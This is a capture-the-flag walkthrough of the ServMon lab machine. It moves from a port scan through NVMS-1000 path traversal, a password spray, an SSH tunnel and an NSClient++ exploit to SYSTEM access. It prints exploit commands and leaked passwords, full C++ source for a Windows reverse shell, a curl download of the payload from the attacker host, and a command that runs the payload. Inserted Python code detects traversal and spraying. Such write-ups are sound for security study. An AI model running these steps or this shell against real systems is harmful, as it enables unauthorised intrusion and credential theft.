Information Gathering
Port Scanning
nmap -sC -sV 10.10.10.184 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 20:22 WIB
Nmap scan report for 10.10.10.184
Host is up (0.027s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| http-title: NSClient++
|_Requested resource was /index.html
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-27T05:18:32
|_ start_date: N/A
|_clock-skew: -8h05m44s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.29 seconds
FTP Anonymous
ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:me): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49702|)
150 Opening ASCII mode data connection.
02-28-22 07:35PM <DIR> Users
226 Transfer complete.
# download everything recursively
wget -r ftp://anonymous:@10.10.10.184
Initial Access
In the FTP information-gathering phase we were able to log in as the anonymous user; inside the FTP share there is a file confidential.txt in the directory Users/Nadine.
That note shows that Nadine left Password.txt on Nathan's desktop, which means its likely location is C:\users\nathan\desktop\password.txt
Next we move to the web server. Here we see that the web server on port 80 is running NVMS-1000,
and a quick search for its vulnerabilities shows that this application is vulnerable to Directory Traversal
https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py
Let's download nvms.py and run it
wget https://github.com/AleDiBen/NVMS1000-Exploit/raw/master/nvms.py
python3 nvms.py 10.10.10.184 users/nathan/desktop/Passwords.txt password.txt
...
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
...
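From the defensive side (an added example, not part of the original write-up): the traversal above works because the file handler never confines the decoded request path to its web root. The Python below, which assumes a constructed web root and constructed access-log lines, shows the containment check such a handler needs and scans log lines for the same pattern, including backslash and double-percent-encoded variants.

```python
import os
from typing import List, Optional
from urllib.parse import unquote

WEB_ROOT = "/srv/www"  # constructed root for the example, not a path from the page


def normalise(url_path: str) -> str:
    """Percent-decode until stable (max 3 rounds, so %252e%252e collapses like
    %2e%2e) and treat backslashes as separators, as Windows servers do."""
    for _ in range(3):
        decoded = unquote(url_path)
        if decoded == url_path:
            break
        url_path = decoded
    return url_path.replace("\\", "/")

def is_traversal_attempt(url_path: str) -> bool:
    """True for a '..' segment, a NUL byte or a drive-letter prefix after decoding."""
    path = normalise(url_path)
    if "\x00" in path or (len(path) > 1 and path[1] == ":"):
        return True
    return any(segment == ".." for segment in path.split("/"))

def resolve_under_root(url_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Map a request path to a file under *root*; None means refuse. Rejects
    traversal textually, then re-checks containment as defence in depth."""
    if is_traversal_attempt(url_path):
        return None
    root = os.path.normpath(root)
    candidate = os.path.normpath(os.path.join(root, normalise(url_path).lstrip("/")))
    return candidate if os.path.commonpath([root, candidate]) == root else None

def flag_access_log(lines: List[str]) -> List[str]:
    """Request paths from combined-format access-log lines that look like traversal."""
    hits = []
    for line in lines:
        quoted = line.split('"')
        request = quoted[1].split() if len(quoted) > 1 else []  # GET /path HTTP/1.1
        if len(request) >= 2 and is_traversal_attempt(request[1]):
            hits.append(request[1])
    return hits

# Constructed log lines (not from the page): a normal hit, the NVMS-1000 traversal
# pattern used above, and the same idea percent-encoded with backslashes.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/May/2024:20:30:01 +0700] "GET /Pages/login.htm HTTP/1.1" 200 340',
    '10.0.0.9 - - [27/May/2024:20:30:07 +0700] "GET /../../../../users/nathan/desktop/Passwords.txt HTTP/1.1" 200 212',
    '10.0.0.9 - - [27/May/2024:20:30:09 +0700] "GET /%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1" 200 92',
]
```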
Here we successfully retrieved passwords.txt from Nathan's desktop. Next we will perform a password spray; for that, let's tidy up the wordlists first.
The usernames found are saved in a file named users
nathan
nadine
The passwords found are saved in a file named pass
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Once everything is ready, let's use crackmapexec to password-spray SMB
crackmapexec smb 10.10.10.184 -u users -p pass --shares
..
SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk
..
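From the detection side (an added example, not part of the original write-up): the spray above leaves a distinctive shape in the Windows Security log, many 4625 failures from one source against several different accounts in a short window, followed by a 4624 when a password lands. The Python below assumes a constructed pipe-delimited export of those events and flags spraying sources and the accounts they got into.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class LogonEvent(NamedTuple):
    time: datetime
    event_id: int      # 4625 = failed logon, 4624 = successful logon
    source_ip: str
    target_user: str

def parse_events(lines: List[str]) -> List[LogonEvent]:
    """Parse the constructed export format used below: time|event_id|ip|user."""
    return [LogonEvent(datetime.fromisoformat(t), int(eid), ip, user.lower())
            for t, eid, ip, user in (line.split("|") for line in lines)]

def detect_spray(events: List[LogonEvent], window: timedelta = timedelta(minutes=5),
                 min_accounts: int = 2, min_failures: int = 6) -> Dict[str, List[str]]:
    """Sources whose 4625 events cover >= min_accounts distinct accounts and total
    >= min_failures within one sliding window: the spray shape, not a single-account
    brute force or a user mistyping their own password."""
    fails_by_src: Dict[str, List[LogonEvent]] = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev.time):
        if e.event_id == 4625:
            fails_by_src[e.source_ip].append(e)
    hits: Dict[str, List[str]] = {}
    for ip, fails in fails_by_src.items():
        start = 0
        for end in range(len(fails)):
            while fails[end].time - fails[start].time > window:
                start += 1          # slide the window forward
            span = fails[start:end + 1]
            accounts = {f.target_user for f in span}
            if len(span) >= min_failures and len(accounts) >= min_accounts:
                hits[ip] = sorted(accounts)
                break
    return hits

def success_after_spray(events: List[LogonEvent], sprayers: Dict[str, List[str]]) -> List[str]:
    """Accounts with a 4624 from a spraying source: the 'a password worked' signal."""
    return sorted({e.target_user for e in events
                   if e.event_id == 4624 and e.source_ip in sprayers})

# Constructed sample export (not real logs): one host sprays two accounts and
# lands on nadine; a second host is a user mistyping their own password.
SAMPLE_LOG = (
    [f"2024-05-27T20:40:{i:02d}|4625|10.10.14.28|nathan" for i in range(7)]
    + [f"2024-05-27T20:40:{i:02d}|4625|10.10.14.28|nadine" for i in range(3)]
    + ["2024-05-27T20:40:03|4624|10.10.14.28|nadine"]
    + [f"2024-05-27T20:41:{i:02d}|4625|10.10.10.50|svc_backup" for i in range(3)]
    + ["2024-05-27T20:41:05|4624|10.10.10.50|svc_backup"]
)
```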
Here we obtain Nadine's credentials, but over SMB that user only has READ permission. However, we know that port 22 is open, so let's try logging in via SSH
ssh nadine@10.10.10.184
We successfully logged in via SSH with the credentials nadine:L1k3B1gBut7s@W0rk
Privilege Escalation
The web server on port 8443 runs NSClient++, as shown in the image below
A quick search shows that this application is vulnerable to RCE that directly yields SYSTEM access
To perform the RCE we need the password, because this exploit is authenticated. So we can try to find the NSClient++ configuration as the nadine user; we can refer to the following page
https://www.exploit-db.com/exploits/46802
NSClient++ is installed in C:\program files\nsclient++; we can change into that directory and run the following command
nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
Here we obtained the password, but when we try to log in we get the following error
After inspecting the configuration file (nsclient.ini), the cause is the host whitelist: the web interface can only be accessed from the local network
type nsclient.ini
...
allowed hosts = 127.0.0.1
...
So let's set up pivoting with sshpass
sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443
ss -tupln | grep 8443
Next, open https://127.0.0.1:8443 in the browser and log in with the password we found
Here we have successfully logged in; now that we have the password and are in the dashboard, we will perform the RCE. Based on that exploit-db reference we need to perform the following steps
Here I will go straight to a reverse shell using a C++ executable. Before that I will build rev.exe, the reverse shell, and transfer it to the machine via the nadine user. Fortunately curl is already available on the server, which makes the file transfer easy
rev.cpp
/*
author: @cocomelonc
windows reverse shell without any encryption/encoding
*/
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")   /* MSVC link hint; the mingw build below passes -lws2_32 explicitly */

WSADATA wsaData;
SOCKET wSock;
struct sockaddr_in hax;
STARTUPINFO sui;
PROCESS_INFORMATION pi;

int main(int argc, char* argv[])
{
    // listener ip, port on attacker's machine
    char *ip = "127.0.0.1";
    short port = 4444;

    // init socket lib
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    // create socket
    wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

    hax.sin_family = AF_INET;
    hax.sin_port = htons(port);
    hax.sin_addr.s_addr = inet_addr(ip);

    // connect to remote host
    WSAConnect(wSock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

    memset(&sui, 0, sizeof(sui));
    sui.cb = sizeof(sui);
    sui.dwFlags = STARTF_USESTDHANDLES;
    sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) wSock;

    // start cmd.exe with redirected streams
    CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
    exit(0);
}
Change the IP and port, then compile with the following command
i686-w64-mingw32-g++ rev.cpp -o rev.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1
Then start a web server locally
python3 -m http.server -b 10.10.14.28
Download the file from the web server onto the machine
cd C:\
mkdir temp
cd temp
curl http://10.10.14.28:8000/rev.exe -o rev.exe
Next we perform the RCE. We can follow the step-by-step reference from exploit-db, or use the automated tool from the following page
https://www.exploit-db.com/exploits/48360
Here I will use that automated tool to trigger the file I transferred
wget https://www.exploit-db.com/raw/48360 -O exploit.py
python3 exploit.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'C:\temp\rev.exe'
Here we obtained nt authority\system access